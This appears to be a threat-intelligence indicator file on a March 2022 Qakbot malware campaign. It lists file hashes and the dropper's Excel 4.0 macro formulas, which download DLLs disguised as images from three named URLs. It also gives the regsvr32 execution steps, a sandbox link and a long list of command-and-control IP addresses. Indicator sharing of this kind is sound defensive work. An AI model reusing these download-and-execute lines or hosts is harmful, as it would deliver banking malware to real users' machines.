Qakbot_AA_25.03.2022.txt
25.03.2022 | Qakbot | AA | Version 403.549
******************************
.xls f531746143a411ef1dec761fff6d71454c2e57863ae25dfa272a0b62b35d8c08
.dll 2608b4e01cfd647dcc1b2690f63be9c4d22db47a9da3305ae8be563e2098b71e
.dll 7b203314e7afb261fc218ec76894a9bde62016782055929917043a7fe99b58b3
.dll 588a56e98e71aaafe4a958db7c49326aeba2a2ce332e966b519540e49586807e
******************************
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Seng", 0)
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://urbizstartup.com/cyL5fzZgbH8/Hnfho.png", "C:\Seng\dsuh1.dll")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://aryanglobalschool.in/L2Xe4PaSpwYi/Hnfho.png", "C:\Seng\dsuh2.dll")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://gurunanakinternational.com/7ZflR1ubibNT/Hnfho.png", "C:\Seng\dsuh3.dll")
https://urbizstartup.com/cyL5fzZgbH8/Hnfho.png
https://aryanglobalschool.in/L2Xe4PaSpwYi/Hnfho.png
https://gurunanakinternational.com/7ZflR1ubibNT/Hnfho.png
******************************
Exec >>
EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\mnatmeie.xls
regsvr32 C:\Seng\dsuh1.dll
regsvr32 C:\Seng\dsuh2.dll
regsvr32 C:\Seng\dsuh3.dll
*************************************************
https://tria.ge/220325-rnkrlsdggl/behavioral1
*************************************************
C2 servers (IP:port)
90.120.65.153:2078
179.100.109.11:32101
24.43.99.75:443
37.186.54.166:995
47.23.89.62:993
72.76.94.99:443
117.248.109.38:21
75.99.168.194:61201
31.215.69.127:443
45.9.20.200:443
203.122.46.130:443
173.174.216.62:443
144.202.2.175:995
149.28.238.199:443
140.82.63.183:443
45.63.1.12:443
140.82.63.183:995
144.202.3.39:995
45.63.1.12:995
45.76.167.26:995
45.76.167.26:443
149.28.238.199:995
144.202.3.39:443
144.202.2.175:443
190.206.211.182:443
86.195.158.178:2222
47.23.89.62:995
70.57.207.83:443
207.170.238.231:443
217.165.85.224:993
1.161.80.99:443
39.44.127.250:995
32.221.225.247:995
5.95.58.211:2087
180.233.150.134:995
45.241.207.212:995
188.55.248.211:995
71.13.93.154:2222
39.33.182.192:995
197.2.149.15:443
121.74.182.236:995
91.177.173.10:995
83.110.85.209:995
41.230.62.211:993
70.46.220.114:443
81.60.216.223:995
172.115.177.204:2222
103.88.226.82:443
80.11.74.81:2222
114.79.148.170:443
89.101.97.139:443
172.114.160.81:995
67.209.195.198:443
75.159.9.236:443
201.172.31.135:2222
24.178.196.158:2222
41.228.22.180:443
182.191.92.203:995
37.152.80.105:443
93.48.80.198:995
92.96.183.242:2222
24.152.219.253:995
113.11.89.170:995
195.32.57.18:80
197.161.137.196:993
39.57.112.37:995
105.186.127.127:995
78.87.196.125:995
217.128.122.65:2222
120.150.218.241:995
79.52.204.9:50001
41.215.152.154:995
2.42.176.91:443
86.98.208.214:2222
190.73.3.148:2222
76.70.9.169:2222
119.158.97.217:995
74.15.2.252:2222
209.180.70.25:443
75.99.168.194:443
118.174.95.247:443
76.69.155.202:2222
78.188.76.167:443
189.146.51.56:443
108.60.213.141:443
177.97.48.132:443
176.67.56.94:443
208.107.221.224:443
148.64.96.100:443
47.180.172.159:443
140.82.49.12:443
92.96.183.242:1194
92.177.45.46:2078
96.21.251.127:2222
161.142.56.8:443
39.49.35.170:995
1.161.80.99:995
175.145.235.37:443
83.110.85.209:443
31.35.28.29:443
202.134.152.2:2222
86.98.27.253:443
5.32.41.45:443
75.188.35.168:443
103.230.180.98:443
76.25.142.196:443
173.21.10.71:2222
189.237.6.251:443
76.169.147.192:32103
71.74.12.34:443
67.165.206.193:993
47.158.25.67:443
73.151.236.31:443
174.69.215.101:443
82.41.63.217:443
45.46.53.140:2222
201.145.226.223:443
201.170.181.247:443
191.99.191.28:443
47.180.172.159:50010
69.159.200.138:2222
201.103.6.221:443
47.156.191.217:443
72.252.201.34:990
63.143.92.99:995
72.12.115.90:22
108.4.67.252:443
189.248.86.71:443
40.134.246.185:995
70.51.135.39:2222
100.1.108.246:443
24.229.150.54:995
24.55.67.176:443
72.252.201.34:995
105.225.175.168:995
179.158.105.44:443
179.178.78.112:443
200.100.246.85:32101
109.12.111.14:443
2.34.12.8:443
143.0.34.185:443
81.132.186.248:2078
82.152.39.39:443
201.172.231.204:443
186.106.197.52:443
187.211.77.68:443
196.203.37.215:80
111.125.245.118:995
176.88.238.122:995
120.61.1.91:443